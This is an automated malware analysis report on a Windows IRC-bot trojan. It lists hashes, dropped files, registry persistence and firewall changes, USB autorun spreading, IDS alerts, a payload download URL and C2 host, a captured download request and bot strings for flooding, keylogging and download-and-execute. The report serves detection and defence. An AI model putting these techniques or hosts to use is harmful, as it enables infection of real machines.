Trojan.GenericKD.2067268_34bede60c0

by malwarelabrobot on January 13th, 2015 in Malware Descriptions.

Trojan.Win32.Agent.amobq (Kaspersky), Trojan.GenericKD.2067268 (B) (Emsisoft), Trojan.GenericKD.2067268 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDropperVtimrun.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun, IRCBot


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 34bede60c04552c0b0bcad13848048aa
SHA1: e9e2bbd8e7c287ff5656af24136721dde305c1e0
SHA256: 6c4e4620e2ca96f368cdcc0314fcb78c8efdefde4830828bccbe83456d2a1dc3
SSDeep: 3072:eoDuN20X5hzHfUSESmnl/4cOTPfQl/4cOTPfK:e3lLUSHtLTlLTK
Size: 135818 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-27 16:02:54
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via IRC channel.


Process activity

The Trojan creates the following process(es):

Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388

The Trojan injects its code into the following process(es):

msconfig.exe:1532
%original file name%.exe:772
hhh.exe:388

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process msconfig.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)

The process Cyanide.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)

The process %original file name%.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)

The process hhh.exe:388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)

The process Ganja145.exe:1436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)

The process NESbot.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\winsvc32.exe (601 bytes)

Registry activity

The process msconfig.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Ganja145.exe" = "Win32 Cabinet Self-Extractor"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA 87 D0 FE C0 18 7D C5 D6 BC 2F 19 D9 8C A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Cyanide.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 1B 90 B5 0C ED 82 71 0B E0 4D 73 C4 0D B0 82"

The process Cyanide.exe:1972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 13 39 0B 6D 45 02 5D 03 13 7E 88 83 64 1B 48"

The process %original file name%.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA DE 2F 50 06 CA B9 13 BD 6A 53 5C 75 18 CD 88"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Cyanide.exe" = "Cyanide"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process hhh.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 17 E2 02 8A 7D 3F D8 66 F6 5E 6A 36 C2 73 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"NESbot.exe" = "NESbot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process winsvc32.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B D8 6D 7E 7B AB A8 BE FD 12 70 E7 30 01 AC B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process Ganja145.exe:1436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 04 94 A9 80 2D A8 DC 21 33 F5 F0 F4 AB 84 A3"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process NESbot.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 58 BE 2D E9 FB 0D 86 63 DC A2 62 85 F0 08 23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process NESbot.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E2 95 EC 3F 2E 23 17 7A 68 08 D3 4D 10 A5 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe"

Dropped PE files

MD5 File path
d6152e2c63bb3e7d4b8f5abf9c76aecf c:\Documents and Settings\"%CurrentUserName%"\Application Data\msconfig.exe
d6152e2c63bb3e7d4b8f5abf9c76aecf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Cyanide.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name:
Product Name:
Product Version: 66.72.12.25
Legal Copyright: Copyright (c) 2014
Legal Trademarks:
Original Filename: sokidsmfsdfsdfs.exe
Internal Name: sokidsmfsdfsdfs.exe
File Version: 66.72.12.25
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 49252 49664 4.34574 0480df25e05b678afc1c4fe541b6f140
.reloc 65536 12 512 0.056519 bf805fbb74b19f1e2e0bd1f15591e752
.rsrc 73728 2588 3072 2.54019 5dfb93c34d83e1f1621fa635f022a43e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
0aaed1ed0c5752822e49e2fcac00792d

URLs

URL IP
hxxp://icetelecoms.co.uk/msn/msn.exe 212.1.215.86
root2.zapto.org 90.147.119.154


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN IRC Nick change on non-standard port
ET TROJAN IRC Channel JOIN on non-standard port
ET TROJAN IRC Bot Download http Command
ET CURRENT_EVENTS SUSPICIOUS IRC - PRIVMSG *.(exe|tar|tgz|zip) download command

Traffic

GET /msn/msn.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icetelecoms.co.uk
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 12:39:48 GMT
Server: Apache
Last-Modified: Sun, 11 Jan 2015 18:17:04 GMT
ETag: "5b50f11-28000-50c64659b4208"
Accept-Ranges: bytes
Content-Length: 163840
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..............C...C
...Cu..C...C...C0..Cu..C...Cu..C...Cu..C...CRich...C................PE
..L....Q.H............................\d..............................
....................................................................4.
..........................0...........................................
........0............................text.............................
.. ..`[email protected]...................
............@[email protected]@...,..HM...,..HZ......Hd......Hn......Hy......H..
..........ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.GDI32.dll.USER32.dll.COM
CTL32.dll.VERSION.dll.................................................
......................................................................
......................................................................
......................................................................
.............................................|.w.|.wj..w.r.w{y.w...w..
.w.l.w...wBx.w...w.z.w...w.C.w......Dw....iZ.w.......|...|...|...|F..|
_..|zO.||N.|.T.|8..|l].|K..|...|...|.).|...|...|...|...|...|l..|.[.|n 
.|Ld.|1..|!..|g..|.N.|...|.(.|d..|i8.|.`.|0..|E..|...|...|YM.|...|...|
...|...|<U.|h!.|.`.|...|...|(..|S..|...|...|...|.P.|n .|;..|0%.|k#.
|.].|.-.|...|...|...|...|...|#..|...|1..|...|./.|...|...|...|...|...|.
..|j>.|.I.|...|{..|...|V..|...|n..|'..|....u.E~..A~..B~ .A~..B~..B~
].A~}[email protected]~..B~..B~..A~..A~..B~..C~nCB~.BB~k.B~..E~}mE~V.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

msconfig.exe_1532:

.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
BeeSwarm.exe
MAPI32.DLL
*.html
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s
new{BoT-XP-USA}508870
\google_cache2.tmp

Ganja145.exe_1436:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
advpack.dll
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
hhh.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
33333330
3333333
33333333
~hq.Ol
%s,LYR}
CG.WT
Ul;y%S
.MPcu
4Ys-o}(
%xmvB
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process <%s>. Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C:<Cmd> -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
